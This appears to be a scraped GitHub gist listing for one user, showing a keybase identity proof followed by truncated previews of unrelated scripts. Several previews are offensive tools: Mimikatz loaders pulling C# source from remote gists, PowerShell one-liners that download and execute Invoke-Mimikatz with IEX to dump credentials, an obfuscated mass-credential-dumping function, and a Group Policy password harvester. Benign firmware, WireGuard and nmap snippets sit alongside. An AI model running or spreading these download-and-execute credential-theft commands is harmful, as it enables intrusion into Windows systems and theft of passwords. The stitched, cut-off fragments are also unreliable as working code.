I hereby claim:
- I am dviros on github.
- I am dviros (https://keybase.io/dviros) on keybase.
- I have a public key ASDQvFG712lwO6HgXWaeFaK6GfIkquaFHx3g2XQZWd0vqwo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; | |
/* |
### Change the region and model by your need. | |
############################################## | |
Add-Type -AssemblyName PresentationFramework | |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | |
$region = "SIN" | |
$model = "SM-N950F" | |
$latestfirmware = "N950FXXS5CRK4/N950FOXM5CRHA/N950FXXU5CRK4" |
#### Mimikatz .Net v4 (2.1.1) | |
#### Many thanks to Casey Smith, Ridter, pljoel | |
########################################################### | |
$url = "https://gist.github.com/Ridter/397db5d672bd273e785f117715574319/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a/katz.cs" | |
$NetFolder = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319" | |
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQC1fii/8MpR5WWVlm8Kakos38ov4mWNnAo03veCOsKA+3GYGXErc+zo7MlCMr9U5Jx74CzxT9JC73xRwTOBr6qLk1o2UxwyqIJtG6eCH5OprcbaFitqtssE2Kpt2g9OrhQXWl5Kl8mIhyaEJket7xyeSv4i/+D95Crs+e8WkNd4vz/vUp+DdJITNg4emFMssabfRPmzvPPZPYhbwo17VjlMosx744WMWwjmgjdrLPORJtks1M8a8swS5Ztk2bBT1ekLCRGnJZpnn21EmJsC0O66LX1KNIYZB+GGQJUXSJzL0AqtCf8HxlR2m6dYlwFGI/uWSImt3J80EjXcEUWefZ/RR5id2a3TNk18jjZ1k5043iGNRXklBBQPqeAIN+BgRiRHkGZ74+DeAP5nF/kJF8qZFlWFkqcBBwlLrOedlbOMY0G/whw01ikB9gwyYqaapat1zzN3Z/PslVc4d2qCCPwoabWbiqhNyA/JTvcjhNI3cPOjgJ9EdBToawuMMdkQxp+LbXP3nn6U0uuLMilaT7YZx4wjp3Za79hntfetMGxzgOXdSgChnahletxNbK3w8LV56ZOrphX7WRdeMWAJhZODhbIVAufs2A3yGIOOZCQoqpXPIM6ZL8NH38Y6iVSrgibvduRjPFvhjfLLOHbz1l |
#### Mimikatz .Net v2 (2.0.0 Alpha) | |
#### Many thanks to Casey Smith, Ridter, pljoel | |
########################################################### | |
$url = "https://gist.githubusercontent.com/Ridter/041e7ca21de39e285e151893edff4bd9/raw/aa59a8691cdad53cda9013c015b8b1a94eb868db/katz.cs" | |
$NetFolder = "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\" | |
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Run IronPython SafetyKatz code using the embedded IPY engine | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1');" | |
# Import Mimikatz Module to run further commands | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] |
function Invoke-Kukuriku21112222 | |
{ | |
[CmdletBinding(DefaultParameterSetName="Dupiduuuuu123")] | |
Param( | |
[Parameter(Position = 0)] | |
[String[]] | |
$ComputerName, | |
[Parameter(ParameterSetName = "Dupiduuuuu123", Position = 1)] | |
[Switch] |
# Quick and dirty AD query script, in use for multi AD environments. | |
# This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run. | |
############################################################################################################## | |
$domains = ("Domain1”,”Domain2”) | |
Import-Module PATH_TO_FILE\Get-GPPPassword.ps1 | |
foreach ($domain in $domains){ | |
Write-Host "Testing SMB Connectivity to" $domain |
#!/bin/bash | |
# This file is designed to spin up a Wireguard VPN quickly and easily, | |
# including configuring Pi-Hole as a recursive local DNS server using | |
# Unbound to block ads a the DNS level | |
# | |
# Make sure to change the public/private keys before running the script | |
# Also change the IPs, IP ranges, and listening port if desired | |
# add wireguard repo | |
sudo add-apt-repository ppa:wireguard/wireguard -y |
$file = read-host "Full path for NMAP scan XML file, eg C:\nmap.xml" | |
$xml = [xml](Get-Content $file) | |
$Results = $Xml.nmaprun.host | | |
ForEach-Object { | |
$hash = [ordered]@{}; $hash.Address = $_.address.addr | |
Foreach ($port in $_.ports.port) { | |
$hash."$($port.service.name)" = $port.state.state | |
} |